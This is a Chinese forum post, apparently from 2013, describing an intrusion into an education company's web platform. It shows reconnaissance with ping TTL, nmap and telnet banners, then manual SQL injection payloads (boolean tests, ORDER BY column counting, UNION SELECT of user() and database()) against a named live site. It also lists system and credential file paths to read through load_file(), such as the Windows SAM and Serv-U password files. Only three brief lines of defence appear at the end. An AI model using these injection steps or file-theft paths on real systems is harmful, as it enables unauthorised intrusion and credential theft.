找回密码
 立即注册
查看: 2509|回复: 0
打印 上一主题 下一主题

记一次Linux系统PHP注入入侵检测

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 22:23:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
题记:/ y/ n3 y/ K+ Y' [2 f% K% m
一位朋友在某教育公司,一套网络教育平台。一年前,在2008年8月份的时候,我看到了这套平台,当时发现了个注入漏洞,测试了一下,得到一个可用帐户后就没有再继续下去。今天7月,又说到此事,我决定继续下去……4 x4 ?/ U5 j; V2 j. V2 K
第一步:获取需要的信息
+ E4 D! x* |* M" l5 Y/ c由于之前测试过,知道此系统某处存在SQL注入漏洞。但由于时隔一年,岁月的远去已经深深的隐藏了那个SQL注入漏洞的地址,现在需要重新收集服务器有用信息。* J0 i' t, P# R: f' p1 R
注:以下为保护特用XXX代替敏感信息
$ U4 T6 E" C3 v顺手先PING了一下他们的域名:
+ X7 S, i, t& A9 u. ?ping XXX.XXX.XXX.XXX(本文约定:用XXX.XXX.XXX.XXX代表测试IP和域名)+ g( Z& o- m* ]% A! ]! j+ {
64 bytes from *********: icmp_seq=1 ttl=246 time=1.87 ms
: |8 L5 |% G. r4 j" M# G顺便了解一下TTL,学好基础知识才能一路顺风:
) @. u& B# }" b$ B' A( v# y9 l( }TTL:(Time To Live ) 生存时间
( n9 |; x& b3 |& e0 z指定数据包被路由器丢弃之前允许通过的网段数量。
4 @) J& z9 \: g" |, @TTL 是由发送主机设置的,以防止数据包不断在 IP 互联网络上永不终止地循环。转发 IP 数据包时,要求路由器至少将 TTL 减小 1。( _. R' f. \, m/ w9 Q
使用PING时涉及到的 ICMP 报文类型
' K) q$ L3 E1 \+ T4 R( I一个为ICMP请求回显(ICMP Echo Request)
: n" s# e. E; R% ?3 [' \一个为ICMP回显应答(ICMP Echo Reply)! ^+ _- y# w" n4 ?
TTL 字段值可以帮助我们识别操作系统类型。
: a2 o$ j# I2 h! U9 U9 Q- X7 P! KUNIX 及类 UNIX 操作系统 ICMP 回显应答的 TTL 字段值为 255
; J; }7 U2 |; p, k9 c+ V: g' `Compaq Tru64 5.0 ICMP 回显应答的 TTL 字段值为 64- E/ g. ?) p, P  u
微软 Windows NT/2K操作系统 ICMP 回显应答的 TTL 字段值为 128$ b$ \5 `3 C; C: O
微软 Windows 95 操作系统 ICMP 回显应答的 TTL 字段值为 327 S& w$ s8 x) s9 C* j* {, h; l
当然,返回的TTL值是相同的$ u/ j8 d; ]4 b$ `0 }4 d
但有些情况下有所特殊
+ f) o( `) T+ C* j! _LINUX Kernel 2.2.x & 2.4.x ICMP 回显应答的 TTL 字段值为 64
0 r* T/ a# H& ]2 n' g9 i) {FreeBSD 4.1, 4.0, 3.4;8 o% n$ |' x$ b7 v
Sun Solaris 2.5.1, 2.6, 2.7, 2.8;
) w) Z% u3 r. u, @* B3 LOpenBSD 2.6, 2.7,6 s# p1 Q. z7 V* x
NetBSD
. t5 U  n  g: JHP UX 10.20; G* v2 J' L6 Z' K: ?/ s
ICMP 回显应答的 TTL 字段值为 255% u/ H& b2 g& K. E0 F$ v1 k3 B8 a
Windows 95/98/98SE
( |) z8 }% y1 |Windows ME
. s" ?  D* J8 {- O, cICMP 回显应答的 TTL 字段值为 320 u+ h8 Q! G2 v! e! D
Windows NT4 WRKS
% c/ L2 f# I- u. eWindows NT4 Server7 t$ y' i$ [/ q8 v9 |: t
Windows 2000! }6 M) \' T) Y: l$ X9 Y8 q
Windows XP4 y# X) v+ j- ~! ]) [
ICMP 回显应答的 TTL 字段值为 128
( Y6 M7 I1 z6 R这样,我们就可以通过这种方法来辨别操作系统+ g8 |# R# X  i( H0 a
TTL值的注册表位置HKEY_LOCAL_MACHINE\SYSTEM \CurrentControlSet\Services\Tcpip\Parameters 其中有个DefaultTTL的DWORD值,其数据就是默认的TTL值了,我们可以修改,但不能大于十进制的2559 U" j, _* z4 C. l
用NMAP扫描一下:  l0 \- w0 v6 x; W  d7 v- m
nmap -sT -O XXX.XXX.XXX.XXX6 L' G1 s- U6 y/ P: ^
如果没有装WinPcap则会弹出提示:1 O2 q5 a( ^0 w' G
WARNING: Could not import all necessary WinPcap functions.  You may need to upgr
3 e  t  k: k& _; v# z- C" ], cade to version 3.1 or higher from http://www.winpcap.org.  Resorting to connect(( P+ P% Y% b) |. G2 N2 I2 V! V$ x
) mode — Nmap may not function completely; k3 E* N/ F. h+ t+ p
TCP/IP fingerprinting (for OS scan) requires that WinPcap version 3.1 or higher9 k- M( I$ d3 \' V& J
and iphlpapi.dll be installed. You seem to be missing one or both of these.  Win
2 z( ^5 H- k# \2 ]' x+ Z" d# A' c! ipcap is available from http://www.winpcap.org.  iphlpapi.dll comes with Win98 an
0 A; A2 c8 z) i3 ~d later operating sytems and NT 4.0 with SP4 or greater.  For previous windows v
, x8 X. X9 z" m, b( `: ]- Nersions, you may be able to take iphlpapi.dll from another system and place it i, {- _" w! S3 g) h
n your system32 dir (e.g. c:\windows\system32).# I, Q, \& H* C1 ~) j& z
QUITTING!
$ {- _3 u' u/ X* e  c: @; w# c到这里下载: http://www.winpcap.org/install/bin/WinPcap_4_1_1.exe
4 |; J" f; c' I9 t* k! ?* X安装后继续执行刚才的命令,等待扫描完毕后得到入下信息:
/ l# j, i1 e) X# V4 z9 ~) _( u4 dInteresting ports on XXX.XXX.XXX.XXX:9 M) @6 K' h( l) N
Not shown: 986 closed ports
! a/ f( ~0 E1 J7 J  IPORT     STATE    SERVICE
/ j, X0 r/ {+ [. b21/tcp   open     ftp
, V+ i, b5 m  `) _# \22/tcp   open     ssh
3 V, i( m) f: h: B2 X$ x" y23/tcp   open     telnet& X+ E9 l1 F: F8 H
80/tcp   open     http
' n% }: y# z1 W, U' ]4 I+ n111/tcp  open     rpcbind% {/ g  B+ h. S9 {% D
135/tcp  filtered msrpc6 E) B( Q* Z  p( S5 x
139/tcp  filtered netbios-ssn
- ]: S, M' {, c9 j) a445/tcp  filtered microsoft-ds
) B* C6 x+ y9 _: v, G513/tcp  open     login6 U, F. i+ H5 X: r5 K
514/tcp  open     shell
5 w8 p  C- L4 U' l7 j' S( {: [, h593/tcp  filtered http-rpc-epmap
  B( E& I2 m: o1720/tcp filtered H.323/Q.931
! Q$ l) `( ?/ q5 [3 R& V3306/tcp open     mysql) N- z' C  h% H
4444/tcp filtered krb524$ I6 t# n6 ]' s) U, K
Device type: WAP
5 S7 C  b: Y1 }Running: Linux 2.4.X8 [4 n; ~% B$ p$ R+ t- I- s
OS details: DD-WRT (Linux 2.4.35s)
8 _% ~! ]$ B6 h) {* j6 PNetwork Distance: 13 hops) X, ?2 r( J3 j( g' a+ m
看到SSH22端口是开着的,打开putty试一下,看是否可以正常连接:
' z) m8 v/ X1 ^" }7 F$ Ologin as:
+ X( r+ W& Y) _6 v. S  b7 D. s4 QTelnet23端口也是开着的,用telnet 命令链接一下:
3 \$ d' x: m) _- _- F' i. ?5 v- qtelnet XXX.XXX.XXX.XXX
0 l" V, A$ ?: ]提示:/ ~3 P5 [* @% U8 u- N5 K2 u; ~
Red Hat Enterprise Linux Server release 5.2 (Tikanga)* t% c; U5 M2 E7 j8 b
Kernel 2.6.18-92.el5PAE on an i686
6 k4 e0 R+ P& vlogin:
: \, L/ x( c( x1 k/ n获取HTTP头信息:
5 I& M2 e! H, F: i$ c+ N( s在本地执行如下PHP代码. t" E8 w  U1 k  _, V1 ~" k( q% Z
<?php) @# \' W( G/ |+ e; i' ?) F
$url = ‘XXX.XXX.XXX.XXX’;
, G6 a% s; U. y6 I4 hprint_r(get_headers($url));% e# @6 ]! D1 S5 g1 ?# X
print_r(get_headers($url, 1));
- K+ j$ m  M3 M: y7 s?>: y' K2 f7 ~1 P- ]0 a
将以上代码保存为PHP文件,执行:! |$ }& k% J* ~
Array ( [0] => HTTP/1.1 200 OK [1] => Server: nginx/0.7.61 [2] => Date: Mon, 02 Nov 2009 09:06:48 GMT [3] => Content-Type: text/html; charset=gb2312,gbk,utf-8 [4] => Content-Length: 75 [5] => Last-Modified: Thu, 20 Aug 2009 19:35:37 GMT [6] => Connection: close [7] => Accept-Ranges: bytes ) Array ( [0] => HTTP/1.1 200 OK [Server] => nginx/0.7.61 [Date] => Mon, 02 Nov 2009 09:06:48 GMT [Content-Type] => text/html; charset=gb2312,gbk,utf-8 [Content-Length] => 75 [Last-Modified] => Thu, 20 Aug 2009 19:35:37 GMT [Connection] => close [Accept-Ranges] => bytes )2 l. s' I6 o0 P
现在可以得出结论:
- w, z1 M8 I# X9 K3 n系统版本:Red Hat Enterprise Linux Server release 5.2 (Tikanga)) a4 a) @1 W' ~  H
内核版本:Kernel 2.6.18-92.el5PAE on an i686# _. m; e; x5 r- l
WEB服务器版本:nginx/0.7.61
6 `4 g0 n$ E8 m% ^第二步,开始测试寻找漏洞* B* c2 L7 f/ f0 U3 z: F
分析是否存在注入漏洞,因为上次曾发现存在过,所以注入则是我们的首选。  Q. _7 ^. n% D) q
1、敏感地址:站内存在有类似:http://www.fovweb.com/XXX.php?id=123 这种地址,属动态传参的
$ f& L& A( }0 K5 u6 P2、测试方法:在地址后加 and 1=1 和 and 1=2 测试
- h' B0 s) I% i0 f+ Ghttp://www.fovweb.com/XXX.php?id=123 and 1=1 返回正常; @" a$ v0 p& F1 O$ Q
http://www.fovweb.com/XXX.php?id=123 and 1=2 返回错误. k9 S6 n; n! K7 k( W
恭喜,两次返回结果不同,则很有可能存在未过滤敏感字符而存在SQL注入漏洞,我们继续
0 G6 R6 L- @, B4 u3、手工注入:. {) z  C* q' }) G" \' M
注入也应该有个思路,不能随便碰运气,要记住入侵检测不是靠运气而走下去的,要靠的是清晰的思路、过硬的技术、很全的知识面。
) J5 ], g! k7 p; I9 G7 P3.1 猜测当前表字段数
, ~4 s& ?/ P- G: d: phttp://www.fovweb.com/XXX.php?id=123 and 1=1 order by 10: h3 o( f2 Z: W, R+ ~% l; D
此处猜测有个简单的算法,都是有技巧的吗,呵呵2 g% }# F: c" q6 @! y
算法简单如下:
( U: z) U  i6 h, J0 i5 S2 B第一步:根据页面信息,大概估算一个数值,这个是要靠一定的经验了;! @& A4 W. s* l
第二步:取中算法,好比是10,如果返回错误,则取中间值5进行下一次猜测;
2 j: ~4 |0 |' p' e需要注意:如果所选数值在字段数范围内即小于等于,则会(返回正常);如果所选数值在字段范围外即大于等于,则会(返回错误)。
/ `" z2 J- ]1 S# p以此来判断,是否过界,配合取中算法猜出字段数。
+ O7 M" k, u! F: X0 |举例:- G  o* \( A' U# u/ `
http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 3 返回正常
7 Z" b5 ]& T+ B; V" xhttp://www.fovweb.com/XXX.php?id=123 and 1=1 order by 4 返回错误
( w( S& e* Z6 {' ^; m) Z此时3则为我们要找的字段数。
+ E" q+ u, i* j4 I! h" s3.2 配合union联合查询字段在页面所位置
2 k% }$ t/ F4 L% w" c: z我们已经知道了字段数为3,此时则可以做如下操作:0 v7 I# P) e# N  o, f) d. D
http://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,2,38 I4 T2 x4 z1 g9 S2 y9 P- d

4 v/ l- H: l& H/ k8 p' R: [* s; `这样就可以测试到哪些字段在页面上有所显示了,如图:/ C% b5 C' z3 K6 i- t

; A% {  j  |1 l2 k! Y1 M% T7 }* x3.3 查敏感信息% }9 x9 I" b7 u  J+ U8 W8 @2 k: O
这也是个思路问题,我们需要什么,其实到了这一步已经能做什么多事情了。, ^' ?1 }1 W( J& F5 N
http://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,user(),database()5 Z- q2 A0 u1 `5 s! l& ^) U
3.3.1 先查数据库用户、数据库名,以备后用,如图:
- |; j' S5 g3 i2 Q
  [3 m1 v9 O4 G. v2 l得到数据库用户为root、数据库名为DBxx;
1 S, k# j2 j2 g) r. Y5 D7 a+ R% |/ V3.3.2 查配置文件. H+ y/ x) B$ s' t* _- o5 S
查配置文件,就是指查看系统敏感的文件,如web服务器配置文件等。6 L1 V& l3 C$ q( u5 F1 g" d& `
查看文件有一定的条件限制:
4 r7 Q7 @; x9 u: b  K9 U欲读取文件必须在服务器上
! [7 [+ v2 G9 ~8 U" r/ _8 K必须指定文件完整的路径7 U4 A8 J% r9 D/ D
必须有权限读取并且文件必须完全可读$ T$ c5 l; M+ v$ C8 g
欲读取文件必须小于 max_allowed_packet
! T; i- d5 H9 C* B4 Q- w) _+ RMYSQL注入中,load_file()函数在获得webshell以及提权过程中起着十分重要的作用,常被用来读取各种配置文件。
$ s& g4 I* l% F9 {, i常用的一些:* B" C0 }/ ?' O% j' m- u. F
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
$ B$ q+ [& W2 q6 s: E. t/usr/local/apache2/conf/httpd.conf8 G! Y" |" o$ x$ O# [
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置3 @3 Z; u+ Y2 p
/usr/local/app/php5/lib/php.ini //PHP相关设置
9 E$ @; ^5 ?! b; f0 q, A/etc/sysconfig/iptables //从中得到防火墙规则策略
& H/ n7 x0 e: i9 }( M/etc/httpd/conf/httpd.conf // apache配置文件
; I0 O5 n5 |# E( u; X3 k/etc/rsyncd.conf //同步程序配置文件* i- h- r: i. t6 P
/etc/sysconfig/network-scripts/ifcfg-eth0 //查看IP.; E+ `8 g' t4 Z; G( L4 f2 R  E
/etc/my.cnf //mysql的配置文件
2 x7 ]/ R5 U. F! T) O* ]/etc/redhat-release //系统版本
0 B/ p' _5 N$ I6 v" G/etc/issue
6 S9 A) t: ~! Z, @/ w/etc/issue.net
& |8 e# h  S5 ?$ Z) l! Kc:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码
" B4 m' w7 |& q4 u6 e9 R8 vc:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码6 _( K) @1 u* P% o
c:\Program Files\Serv-U\ServUDaemon.ini
3 W& c4 J6 f: y9 p5 w" c( p6 m0 hc:\windows\my.ini //MYSQL配置文件5 k$ Z+ [9 w# [9 f+ `. s
c:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件" s, K( k& v! @) ^2 o! ]# s/ Q
等等。实际上,load_file()的作用不止于此,它还可以用来读取系统中的二进制文件,3 P6 x' K- P5 A  U
c:\windows\repair\sam //存储了WINDOWS系统初次安装的密码; p' N# e5 f2 D4 g- V2 N
c:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此
- M9 U; {3 _+ `3 v2 ac:\Program Files\RhinoSoft.com\ServUDaemon.exe" ]& V$ ]4 S/ i) b0 N
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
3 a3 ], [* ~5 f9 w. f//存储了pcAnywhere的登陆密码
# [3 W$ I" m0 M  D  c  D6 B# O, H由于之前得到信息,此台服务器是采用的nginx做的Web服务器,那我们就来试着找一下nginx的安装路径吧。
- z  ]2 ]& _0 O8 g7 R  f2 ?) x这个没有技术性可言,纯靠经验和运气,由于很少用nginx不了解,我就先到网上搜索常用的安装路径,以及比较好的配置文档中的安装路径进行测试,最终,得到nginx安装路径“/usr/local/nginx/conf/nginx.conf”。7 B+ c' T, m% w% q% n, b$ l. ?) Z
最后:防范措施
3 T7 i9 S" H. l* X! t1、修复PHP注入漏洞;
+ @, B6 ^; e, ?2、Mysql使用普通权限的用户;. T+ U8 a9 z/ h5 ~. L
3、升级linux内核至最新版本;
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表